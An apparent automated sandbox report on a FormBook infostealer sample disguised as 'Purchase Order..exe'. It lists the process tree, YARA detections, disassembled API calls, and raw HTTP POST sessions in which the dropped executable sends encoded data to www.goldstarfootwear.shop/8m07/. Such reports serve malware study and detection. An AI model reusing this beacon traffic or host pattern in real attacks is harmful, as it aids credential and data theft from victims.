                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                          Dec 3, 2024 14:27:28.045747042 CET96INData Raw: 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67
                                                          Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.8497303.33.130.19080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:33.526524067 CET652OUTPOST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 70 6a 46 4e 78 44 50 73 76 71 2f 54 74 6e 2f 76 71 58 52 64 72 6b 33 52 50 4b 4e 49 58 73 6c 44 6f 70 6c 67 5a 73 36 55 59 44 35 6a 6c 31 5a 31 51 50 63 2b 7a 77 5a 4d 38 37 34 41 52 77 76 77 74 4d 4d 48 54 72 2f 61 51 49 50 6d 38 62 56 6c 5a 31 31 4e 45 2b 33 4d 43 33 51 4d 7a 44 66 6b 45 5a 65 57 44 77 75 36 62 54 36 4c 35 49 30 4e 36 6a 6c 66 68 55 68 6f 62 43 74 32 78 67 32 67 4f 79 58 6c 56 74 47 6f 62 52 48 4d 30 4f 4c 79 6c 51 41 2f 69 73 39 73 50 4c 2b 77 4e 65 32 34 45 58 71 4c 7a 35 51 59 5a 6a 53 64 37 70 33 6c 34 77 51 51 61 35 6b 4c 4c 6c 55 3d
                                                          Data Ascii: MVWd=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/is9sPL+wNe24EXqLz5QYZjSd7p3l4wQQa5kLLlU=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.8497313.33.130.19080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:36.266535044 CET672OUTPOST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 52 44 6f 49 56 67 66 64 36 55 49 54 35 6a 74 56 5a 77 55 50 63 44 7a 77 64 79 38 36 45 41 52 77 72 77 74 4e 38 48 54 34 48 56 51 59 50 6b 30 37 56 6e 57 56 31 4e 45 2b 33 4d 43 33 46 70 7a 44 48 6b 45 70 75 57 43 56 4f 35 57 7a 36 4b 6f 49 30 4e 70 7a 6c 54 68 55 67 4e 62 44 77 6a 78 6d 36 67 4f 7a 6e 6c 4d 63 47 72 56 68 48 43 33 2b 4b 64 75 46 68 6f 6b 50 45 58 55 6f 71 72 42 34 47 61 49 42 62 68 70 62 59 65 61 6a 36 32 37 71 66 54 39 48 4e 34 41 61 30 37 56 79 42 71 59 51 6e 6e 4e 79 39 41 5a 78 49 6c 39 7a 69 57 6a 59 37 53
                                                          Data Ascii: MVWd=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaj627qfT9HN4Aa07VyBqYQnnNy9AZxIl9ziWjY7S


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.8497323.33.130.19080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:39.338541985 CET1689OUTPOST /8m07/ HTTP/1.1
                                                          Host: www.goldstarfootwear.shop
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.goldstarfootwear.shop
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 4a 44 6f 61 4e 67 63 2b 53 55 61 44 35 6a 6a 31 5a 78 55 50 63 53 7a 77 6c 32 38 36 49 71 52 79 44 77 74 76 45 48 47 35 48 56 65 59 50 6b 34 62 56 6d 5a 31 31 59 45 39 4f 46 43 33 56 70 7a 44 48 6b 45 71 32 57 4c 67 75 35 46 6a 36 4c 35 49 30 6f 36 6a 6b 47 68 51 4e 77 62 44 6c 59 78 57 61 67 4f 51 66 6c 4f 4f 65 72 54 78 48 41 2b 75 4b 46 75 46 6b 76 6b 4c 6c 35 55 70 75 56 42 2f 79 61 4b 67 32 68 72 70 73 44 47 69 36 63 36 62 48 74 39 47 59 63 4b 35 63 4d 57 79 4e 30 5a 30 44 39 41 67 73 49 64 68 39 2b 6f 43 71 79 79 2f 44 62 58 44 70 74 72 36 74 46 31 54 70 50 37 57 37 6f 75 78 63 58 79 5a 6e 4e 63 4e 51 41 6b 2b 52 35 67 69 45 77 54 4b 69 4b 57 43 45 37 56 57 6c 68 52 79 47 4d 75 56 6b 54 67 64 30 53 58 45 33 2b 57 4a 35 39 6c 72 67 2b 48 42 4b 6b 33 78 32 4d 7a 68 61 48 63 79 67 50 57 69 4f 44 4c 55 59 72 42 43 44 34 78 52 79 44 75 76 62 48 30 76 42 33 67 [TRUNCATED]
                                                          Data Ascii: MVWd=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeJDoaNgc+SUaD5jj1ZxUPcSzwl286IqRyDwtvEHG5HVeYPk4bVmZ11YE9OFC3VpzDHkEq2WLgu5Fj6L5I0o6jkGhQNwbDlYxWagOQflOOerTxHA+uKFuFkvkLl5UpuVB/yaKg2hrpsDGi6c6bHt9GYcK5cMWyN0Z0D9AgsIdh9+oCqyy/DbXDptr6tF1TpP7W7ouxcXyZnNcNQAk+R5giEwTKiKWCE7VWlhRyGMuVkTgd0SXE3+WJ59lrg+HBKk3x2MzhaHcygPWiODLUYrBCD4xRyDuvbH0vB3gFPmzp6BvBKNq2htH0szSm9kR6nDs5yuIrrMbb+RYd7wvrktRVZGD2ELuf6VcmAyw4KH3UvrsytB7nzblTfsn2rvZIOsL6uQtnA4Fa45yoFR5wDdCWkMNDED+V58DFGHAOhU1AzM6iFAdDBn+5lYWcFV4KHLNwJQP4K4b1/KOREIbO4ql5XmUh3A3NlrpUXjJYnpaENmQYVGFzQj0vNLckQChWQZVsxl9MDWoO8OmLlgsspwuBO+Zs2sN21PIaa82RdD8xbNGK9dTzxZsE4C+PTtYWSqKbTWr2F5+F9g8siHMLvQjb42mZG5jZNmZ1nZ+pqKvSklbvU6nDqCoMeY59OGGMVBEyak2Dtyxmr7WZdeMzEmuz+SdBAdIo5v8/ux5mxZiUbtdkf5Smbm/8uCo3Qa8zqBhQBEsYO9HjjOoinrAd7SPjaNnsj9sDTfcVCEUJ6WkADbWfeYAvQmNnQ+F1zlG5HZmoOBKHPdETHICDT4dvRPUejVWaS8fKoVep3aIdWzK497tnsdJtewWJxKqwBfdV4PQjI+e8NXvLwTOR29yfkrPWYdD3wrs9cFT/5b470f3u4ImOaoHq69hG6rQjDgeQeD65Xt8DALXDaGrD0HmUcZu0LUeZlobD5FVIlWsepk4+mpckH78gGoM6iUKyTftSGJaYiKude [TRUNCATED]


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:25:33
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Purchase Order..exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase Order..exe"
                                                          Imagebase:0xc20000
                                                          File size:766'976 bytes
                                                          MD5 hash:ECB3A0578FE97356ED12DA57BC6BBC36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:08:25:36
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Purchase Order..exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Purchase Order..exe"
                                                          Imagebase:0xda0000
                                                          File size:766'976 bytes
                                                          MD5 hash:ECB3A0578FE97356ED12DA57BC6BBC36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1836694214.0000000001B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1836855226.0000000003140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:08:26:07
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe"
                                                          Imagebase:0xc10000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:6
                                                          Start time:08:26:09
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                          Imagebase:0xf50000
                                                          File size:107'008 bytes
                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659993689.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2659764496.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:9
                                                          Start time:08:26:23
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe"
                                                          Imagebase:0xc10000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:11
                                                          Start time:08:26:35
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6d20e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:7.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:78
                                                            Total number of Limit Nodes:8
                                                            execution_graph 17428 166d5a0 DuplicateHandle 17429 166d636 17428->17429 17430 1664668 17431 1664672 17430->17431 17435 1664758 17430->17435 17440 1663e34 17431->17440 17433 166468d 17436 1664765 17435->17436 17444 1664868 17436->17444 17448 1664858 17436->17448 17441 1663e3f 17440->17441 17456 1665d24 17441->17456 17443 1666f8f 17443->17433 17446 166488f 17444->17446 17445 166496c 17446->17445 17452 16644b4 17446->17452 17449 1664868 17448->17449 17450 166496c 17449->17450 17451 16644b4 CreateActCtxA 17449->17451 17451->17450 17453 16658f8 CreateActCtxA 17452->17453 17455 16659bb 17453->17455 17457 1665d2f 17456->17457 17460 1665da4 17457->17460 17459 16671bd 17459->17443 17461 1665daf 17460->17461 17464 1665dd4 17461->17464 17463 166729a 17463->17459 17465 1665ddf 17464->17465 17468 1665df4 17465->17468 17467 166738d 17467->17463 17469 1665dff 17468->17469 17471 16688eb 17469->17471 17474 166afa0 17469->17474 17470 1668929 17470->17467 17471->17470 17478 166d080 17471->17478 17483 166afc8 17474->17483 17488 166afd8 17474->17488 17475 166afb6 17475->17471 17479 166d0b1 17478->17479 17480 166d0d5 17479->17480 17502 166d240 17479->17502 17506 166d22f 17479->17506 17480->17470 17484 166afd8 17483->17484 17492 166b0d0 17484->17492 17497 166b0bf 17484->17497 17485 166afe7 17485->17475 17490 166b0d0 GetModuleHandleW 17488->17490 17491 166b0bf GetModuleHandleW 17488->17491 17489 166afe7 17489->17475 17490->17489 17491->17489 17493 166b0e1 17492->17493 17494 166b104 17492->17494 17493->17494 17495 166b308 GetModuleHandleW 17493->17495 17494->17485 17496 166b335 17495->17496 17496->17485 17498 166b104 17497->17498 17499 166b0e1 17497->17499 17498->17485 17499->17498 17500 166b308 GetModuleHandleW 17499->17500 17501 166b335 17500->17501 17501->17485 17503 166d24d 17502->17503 17504 166d287 17503->17504 17510 166cb78 17503->17510 17504->17480 17507 166d24d 17506->17507 17508 166d287 17507->17508 17509 166cb78 2 API calls 17507->17509 17508->17480 17509->17508 17511 166cb7d 17510->17511 17513 166db98 17511->17513 17514 166cca4 17511->17514 17515 166ccaf 17514->17515 17516 1665df4 2 API calls 17515->17516 17517 166dc07 17516->17517 17517->17513 17518 166d358 17519 166d39e GetCurrentProcess 17518->17519 17521 166d3f0 GetCurrentThread 17519->17521 17522 166d3e9 17519->17522 17523 166d426 17521->17523 17524 166d42d GetCurrentProcess 17521->17524 17522->17521 17523->17524 17527 166d463 17524->17527 17525 166d48b GetCurrentThreadId 17526 166d4bc 17525->17526 17527->17525

                                                            Executed Functions

                                                            Function 0166D348 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D3D6
                                                            • GetCurrentThread.KERNEL32 ref: 0166D413
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D450
                                                            • GetCurrentThreadId.KERNEL32 ref: 0166D4A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 76c312a0115ec1df72758ab166ccdd9c2a26fd0aad0c3be3248e00e9da044010
                                                            • Instruction ID: 07696f74c25119933b49c4d8e17055cef73305f0b6277dbd61726c3910bda809
                                                            • Opcode Fuzzy Hash: 76c312a0115ec1df72758ab166ccdd9c2a26fd0aad0c3be3248e00e9da044010
                                                            • Instruction Fuzzy Hash: A15135B091130A8FEB54DFA9D948BEEBBF5FB88314F208459E409A7390DB346944CB65
                                                            Function 0166D358 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D3D6
                                                            • GetCurrentThread.KERNEL32 ref: 0166D413
                                                            • GetCurrentProcess.KERNEL32 ref: 0166D450
                                                            • GetCurrentThreadId.KERNEL32 ref: 0166D4A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 1d82e3875fa1b676576ed433b1f82084f904f72fa88a6662c10b7f840ac2a0c9
                                                            • Instruction ID: 49d75164781f188307cecba73ed58a927a1a6be53744a4a8be63085f570ec703
                                                            • Opcode Fuzzy Hash: 1d82e3875fa1b676576ed433b1f82084f904f72fa88a6662c10b7f840ac2a0c9
                                                            • Instruction Fuzzy Hash: 7F5135B09113098FEB54DFAAD948BDEBBF5FB88314F208459E409A7390DB346944CF65
                                                            Function 0166B0D0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 44 166b0d0-166b0df 45 166b0e1-166b0ee call 1669ad4 44->45 46 166b10b-166b10f 44->46 53 166b104 45->53 54 166b0f0 45->54 47 166b123-166b164 46->47 48 166b111-166b11b 46->48 55 166b166-166b16e 47->55 56 166b171-166b17f 47->56 48->47 53->46 99 166b0f6 call 166b368 54->99 100 166b0f6 call 166b358 54->100 55->56 58 166b1a3-166b1a5 56->58 59 166b181-166b186 56->59 57 166b0fc-166b0fe 57->53 60 166b240-166b300 57->60 61 166b1a8-166b1af 58->61 62 166b191 59->62 63 166b188-166b18f call 166aab4 59->63 94 166b302-166b305 60->94 95 166b308-166b333 GetModuleHandleW 60->95 65 166b1b1-166b1b9 61->65 66 166b1bc-166b1c3 61->66 64 166b193-166b1a1 62->64 63->64 64->61 65->66 69 166b1c5-166b1cd 66->69 70 166b1d0-166b1d9 call 166aac4 66->70 69->70 75 166b1e6-166b1eb 70->75 76 166b1db-166b1e3 70->76 77 166b1ed-166b1f4 75->77 78 166b209-166b216 75->78 76->75 77->78 80 166b1f6-166b206 call 166aad4 call 166aae4 77->80 85 166b218-166b236 78->85 86 166b239-166b23f 78->86 80->78 85->86 94->95 96 166b335-166b33b 95->96 97 166b33c-166b350 95->97 96->97 99->57 100->57
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0166B326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: eb20d9c4e1b602c78e5be67f71b33b740b79e2a7eca14df7612798ce58aad4d2
                                                            • Instruction ID: ce7d5825d9ba106c06d6528394c9bf34e6b03bf369d5afe37aaed5c4c4a5c841
                                                            • Opcode Fuzzy Hash: eb20d9c4e1b602c78e5be67f71b33b740b79e2a7eca14df7612798ce58aad4d2
                                                            • Instruction Fuzzy Hash: FD711370A00B05DFDB24DF69D94476ABBF9BF88200F00892ED44ADBB40D774E945CB91
                                                            Function 016644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 101 16644b4-16659b9 CreateActCtxA 104 16659c2-1665a1c 101->104 105 16659bb-16659c1 101->105 112 1665a1e-1665a21 104->112 113 1665a2b-1665a2f 104->113 105->104 112->113 114 1665a40 113->114 115 1665a31-1665a3d 113->115 116 1665a41 114->116 115->114 116->116
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 016659A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: ca73abe701129f73bf14966424f8af0bb0b02f6bef337dcfc37d72c168f42a3f
                                                            • Instruction ID: 8de1f704595498233d8e716a20006ae89c5c8d7c0ed40d7e67fce57a2d34e407
                                                            • Opcode Fuzzy Hash: ca73abe701129f73bf14966424f8af0bb0b02f6bef337dcfc37d72c168f42a3f
                                                            • Instruction Fuzzy Hash: F641E170C0071DCFDB24DFAAC885B9EBBB5BF89704F20816AD409AB251DB716945CF90
                                                            Function 016658ED Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 118 16658ed-16659b9 CreateActCtxA 120 16659c2-1665a1c 118->120 121 16659bb-16659c1 118->121 128 1665a1e-1665a21 120->128 129 1665a2b-1665a2f 120->129 121->120 128->129 130 1665a40 129->130 131 1665a31-1665a3d 129->131 132 1665a41 130->132 131->130 132->132
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 016659A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 5da9ab5e506f77ec700cf04168dd2c86a3d6022d32626ca596819ed13ae31021
                                                            • Instruction ID: 0491f2a8e12c0d00afe49f10431dd90f34d6b32352b08d4792d8805d78302d78
                                                            • Opcode Fuzzy Hash: 5da9ab5e506f77ec700cf04168dd2c86a3d6022d32626ca596819ed13ae31021
                                                            • Instruction Fuzzy Hash: 8141FFB1C0071ACBDB24DFA9C885BCEBBB5BF89704F20815AD409AB250DB716945CF50
                                                            Function 0166D5A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 139 166d5a0-166d634 DuplicateHandle 140 166d636-166d63c 139->140 141 166d63d-166d65a 139->141 140->141
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0166D627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 2c8ac23d142c5fc748b4efd717f4de45a8429c906d003659376f1500d978e86e
                                                            • Instruction ID: f36b0c9b818bb053be4632fa3f74e06560d0eabdc9bf8a1a90c4e68a8032b7d7
                                                            • Opcode Fuzzy Hash: 2c8ac23d142c5fc748b4efd717f4de45a8429c906d003659376f1500d978e86e
                                                            • Instruction Fuzzy Hash: BF21E4B59002199FDB10CFAAD884ADEBBF9FB48310F14801AE958A3350D374A940CF64
                                                            Function 0166D599 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 134 166d599-166d634 DuplicateHandle 135 166d636-166d63c 134->135 136 166d63d-166d65a 134->136 135->136
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0166D627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: f3b15c999180dd4308c1ce2314fa76983c778f81fc9247400756c718946d6f54
                                                            • Instruction ID: d9c3dffc7d009f10e40be3d0aa372fb7791bba78d13505739c290db39e1af549
                                                            • Opcode Fuzzy Hash: f3b15c999180dd4308c1ce2314fa76983c778f81fc9247400756c718946d6f54
